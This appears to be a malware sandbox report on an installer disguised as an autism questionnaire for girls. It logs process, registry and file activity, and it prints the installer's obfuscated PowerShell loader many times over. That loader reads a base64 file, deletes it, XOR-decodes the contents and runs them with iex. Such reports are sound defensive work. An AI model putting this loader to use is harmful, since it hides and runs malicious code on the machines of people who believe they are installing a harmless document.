            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,0_2_004AF9F0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: /LOADINF="filename"
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile opened: C:\Windows\SysWOW64\Msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic file information: File size 103560224 > 1048576
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.383501871.00000000038C0000.00000004.00000001.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000003.388759087.0000000007351000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.394460338.00000000038C4000.00000004.00000001.sdmp

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Obfuscated command line foundShow sources
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
